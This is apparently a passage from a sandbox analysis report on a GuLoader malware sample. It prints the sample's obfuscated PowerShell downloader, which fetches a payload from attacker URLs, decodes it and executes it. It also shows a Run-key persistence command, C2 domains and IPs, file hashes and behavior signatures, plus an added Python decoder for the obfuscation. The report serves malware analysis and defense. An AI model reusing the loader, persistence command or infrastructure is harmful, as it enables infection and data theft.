u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
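The two PowerShell command lines above (PID 3824 under the 64-bit host, then the same script relaunched as PID 3592 under the 32-bit syswow64 host) never contain a sensitive string in the clear. Every one is an argument to the Swatheable function: $Dominator starts undefined and becomes 1 only after ${host}.CurrentCulture is found to be set, after which the function walks the literal from index 1 to Length-2 in steps of two and keeps one character per step, so the even positions are filler and the odd positions are the payload (if CurrentCulture were empty, $Dominator would stay 0, every Substring call would return nothing and the script would do nothing, which doubles as a cheap host check). The decoded strings are then run through `. iex`. Readable from the literals this way: the header name User-Agent with a Firefox user-agent string, a list of four download URLs joined by ">" and split into the fallback array $Otariine that the while loop walks with $Unhermitically until Test-Path succeeds, the download target %appdata%\Coqueluche14.myx (also visible in the cmd.exe child's echo), and the final stage, which Base64-decodes the downloaded file, takes Substring(370878, 26015) of the result and executes it.

The decoder below is an added example written for this page; it is not part of the report or of the sample. It embeds literals copied from the command line above. One caveat a practitioner should know: the report's HTML rendering collapsed runs of two spaces inside some literals, which shifts the filler/payload parity from that point on, so only literals whose decoded text contains no spaces survive intact here; the echo literal is included to show the damage against the cmd.exe command line the sandbox actually recorded. Decode from the raw sample, not from a rendered report.

```python
"""Decoder for the string obfuscation in this sample's PowerShell stage.

Added example for this page; not part of the sandbox report or of the sample.
Python port of the Swatheable function from the command line above: with
$Dominator == 1 it keeps the character at every odd index from 1 up to (but
not including) Length-1, so even positions are filler and the last character
(a padding space) is never reached.
"""
import re


def swatheable(s: str) -> str:
    """For ($i = 1; $i -lt $s.Length - 1; $i += 2) { $out += $s.Substring($i, 1) }"""
    return "".join(s[i] for i in range(1, len(s) - 1, 2))


def extract_literals(script: str) -> list:
    """Return every `Swatheable '...'` argument in a script, in order of appearance."""
    return re.findall(r"Swatheable\s+'([^']*)'", script)


# Literals copied from the report's PowerShell command line. Only literals whose
# decoded text contains no spaces are used for results: the report's HTML rendering
# collapsed double spaces inside the others, which shifts the filler/payload parity.
USER_AGENT_LIT = "PU s eOrS- ADg.eSn t. "
SEPARATOR_LIT = ".>S "
SPLIT_LIT = " $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L "
URL_LIST_LIT = (
    "Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>I"
    "hNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > "
    "hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> "
    "h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z "
)
# A literal damaged by the rendering (two collapsed double spaces), paired with the
# command line the sandbox recorded for the cmd.exe child it produces.
ECHO_LIT = r"Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE "
ECHO_OBSERVED = r"echo %appdata%\Coqueluche14.myx && echo t"


def payload_urls(url_list_lit: str = URL_LIST_LIT, sep_lit: str = SEPARATOR_LIT) -> list:
    """Reproduce $Otariine = $Stormhat.split($Barskt): the ordered fallback download list."""
    return swatheable(url_list_lit).split(swatheable(sep_lit))


def decode_report_literals() -> dict:
    """Decode the intact literals from this report's command line."""
    return {
        "user_agent_header": swatheable(USER_AGENT_LIT),
        "url_separator": swatheable(SEPARATOR_LIT),
        "split_statement": swatheable(SPLIT_LIT),
        "download_urls": payload_urls(),
    }


def echo_literal_round_trips() -> bool:
    """True only if the rendered echo literal still decodes to the observed command line."""
    return swatheable(ECHO_LIT) == ECHO_OBSERVED


if __name__ == "__main__":
    for name, value in decode_report_literals().items():
        print(f"{name}: {value}")
    print("echo literal intact:", echo_literal_round_trips())
```

extract_literals() is the general form: run it over the full command line of a sample of this family, decode each hit with swatheable(), and the configuration (URLs, header, drop path, offset and length of the next stage) falls out in order of appearance.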

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzbivks"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ctganddgxs"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mvltovwilahgiw"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3272 -ip 3272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2904 -ip 2904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 400 -ip 400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rendl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyanmfeoj"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4264 -ip 4264

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eafgnxoixvow"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5116 -ip 5116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1352 -ip 1352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yityrwjukssqvydvandjmigzvicenqsn"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkgq"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lembkhe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2844 -ip 2844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3348 -ip 3348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 4252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gtiapoyaaegbtlsibnyfqbzhygi"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qnnligjuwmyfesgmlxlyaguqymzijc"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2428 -ip 2428

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apsdiruwkvqkggcyciyalsohhtjrcnjkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2008 -ip 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\veovnxghxrveshhevumtbt"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xytnfqrblznicnvimfymegnyb"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1008 -ip 1008

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ibzygicczhfvftrmwqtoplhhbrpv"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4692 -ip 4692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4660 -ip 4660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nkailzhhjmbtbijwgfui"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pefaesrjwutydoyixqhcsma"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4648 -ip 4648

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgttfkcdkcllovumhatdvqvyewm"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1228 -ip 1228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1088 -ip 1088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ungkjjxoyzpfawy"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\epmvcbhqmhhjckmwrxu"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hkzodusjapaomqiaiihrhr"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2804 -ip 2804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2104 -ip 2104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bznfhsmvvl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ltayalxwjuwuax"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1700 -ip 1700

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wvgqadiqxcozldpwc"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1556 -ip 1556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1680 -ip 1680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qktifk"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tehsfdfdz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3292 -ip 3292

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dgmlyvqxnock"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3340 -ip 3340

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 12

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ipnv"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sktnwff"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmyyxxqfyj"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2436 -ip 2436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2696 -ip 2696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 12

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 12

Network

Country  Destination          Domain                         Proto
US       8.8.8.8:53           133.32.126.40.in-addr.arpa     udp
US       8.8.8.8:53           moviesmacktalk.com             udp
RO       89.42.218.27:443     moviesmacktalk.com             tcp
US       8.8.8.8:53           27.218.42.89.in-addr.arpa      udp
US       8.8.8.8:53           26.35.223.20.in-addr.arpa      udp
US       8.8.8.8:53           milanaces.com                  udp
BG       193.25.216.108:443   milanaces.com                  tcp
US       8.8.8.8:53           r10.o.lencr.org                udp
GB       2.18.190.80:80       r10.o.lencr.org                tcp
US       8.8.8.8:53           108.216.25.193.in-addr.arpa    udp
US       8.8.8.8:53           168.245.100.95.in-addr.arpa    udp
US       8.8.8.8:53           80.190.18.2.in-addr.arpa       udp
US       8.8.8.8:53           janbours92harbu02.duckdns.org  udp
US       192.169.69.26:3980   janbours92harbu02.duckdns.org  tcp
US       192.169.69.26:3981   janbours92harbu02.duckdns.org  tcp
US       8.8.8.8:53           janbours92harbu03.duckdns.org  udp
US       8.8.8.8:53           26.69.169.192.in-addr.arpa     udp
BE       172.111.244.38:3980  janbours92harbu03.duckdns.org  tcp
BE       172.111.244.38:3980  janbours92harbu03.duckdns.org  tcp
US       8.8.8.8:53           geoplugin.net                  udp
NL       178.237.33.50:80     geoplugin.net                  tcp
US       8.8.8.8:53           38.244.111.172.in-addr.arpa    udp
US       8.8.8.8:53           50.33.237.178.in-addr.arpa     udp
US       8.8.8.8:53           81.144.22.2.in-addr.arpa       udp
US       8.8.8.8:53           11.227.111.52.in-addr.arpa     udp
US       8.8.8.8:53           8.179.89.13.in-addr.arpa       udp

Files

memory/3824-0-0x00007FF954D03000-0x00007FF954D05000-memory.dmp

memory/3824-1-0x000001FF70890000-0x000001FF708B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xevpyg1.cgr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3824-11-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/3824-12-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/3592-15-0x0000000003040000-0x0000000003076000-memory.dmp

memory/3592-16-0x0000000005CA0000-0x00000000062C8000-memory.dmp

memory/3592-17-0x0000000005AB0000-0x0000000005AD2000-memory.dmp

memory/3592-18-0x0000000005B50000-0x0000000005BB6000-memory.dmp

memory/3592-19-0x00000000062D0000-0x0000000006336000-memory.dmp

memory/3592-29-0x0000000006370000-0x00000000066C4000-memory.dmp

memory/3592-30-0x0000000006960000-0x000000000697E000-memory.dmp

memory/3592-31-0x00000000069A0000-0x00000000069EC000-memory.dmp

memory/3592-32-0x0000000008190000-0x000000000880A000-memory.dmp

memory/3592-33-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

memory/3592-34-0x0000000007C30000-0x0000000007CC6000-memory.dmp

memory/3592-35-0x0000000007BC0000-0x0000000007BE2000-memory.dmp

memory/3592-36-0x0000000008DC0000-0x0000000009364000-memory.dmp

C:\Users\Admin\AppData\Roaming\Coqueluche14.myx

MD5 8e72b507dadf417f0f922a8cc04533d5
SHA1 d2fb1f560d46af90f009069855dc1f94179c5b6a
SHA256 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c
SHA512 cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

memory/3592-38-0x0000000009370000-0x000000000A320000-memory.dmp

memory/3824-40-0x00007FF954D03000-0x00007FF954D05000-memory.dmp

memory/3824-41-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/4100-48-0x00000000020E0000-0x0000000003090000-memory.dmp

memory/3824-50-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp

memory/2904-55-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3272-56-0x0000000000400000-0x0000000000462000-memory.dmp

memory/400-57-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4100-90-0x0000000003260000-0x0000000003279000-memory.dmp

memory/4100-94-0x0000000003260000-0x0000000003279000-memory.dmp

memory/4100-93-0x0000000003260000-0x0000000003279000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 18:54

Reported

2024-07-09 18:56

Platform

win7-20240708-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Adds Run key to start application

persistence
Description      Indicator  Process  Target
Set value (str)  \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)"  C:\Windows\SysWOW64\reg.exe  N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description  Indicator  Process                                      Target
N/A          N/A        C:\Program Files (x86)\windows mail\wab.exe  N/A
N/A          N/A        C:\Program Files (x86)\windows mail\wab.exe  N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  N/A
N/A          N/A        C:\Program Files (x86)\windows mail\wab.exe                N/A

Suspicious use of SetThreadContext

Description                          Indicator  Process                                                    Target
PID 3068 set thread context of 1240  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description  Indicator  Process                      Target
N/A          N/A        C:\Windows\SysWOW64\reg.exe  N/A

Suspicious behavior: MapViewOfSection

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A
Token: SeDebugPrivilege  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of WriteProcessMemory

Description                       Indicator  Process                                                    Target
PID 1680 wrote to memory of 2692  N/A        C:\Windows\System32\WScript.exe                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2692  N/A        C:\Windows\System32\WScript.exe                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2692  N/A        C:\Windows\System32\WScript.exe                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 2808  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2808  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2808  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 3068  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 3068  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 3068  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 3068  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2384  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2384  N/A        C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe  C:\Windows\SysWOW64\cmd.exe
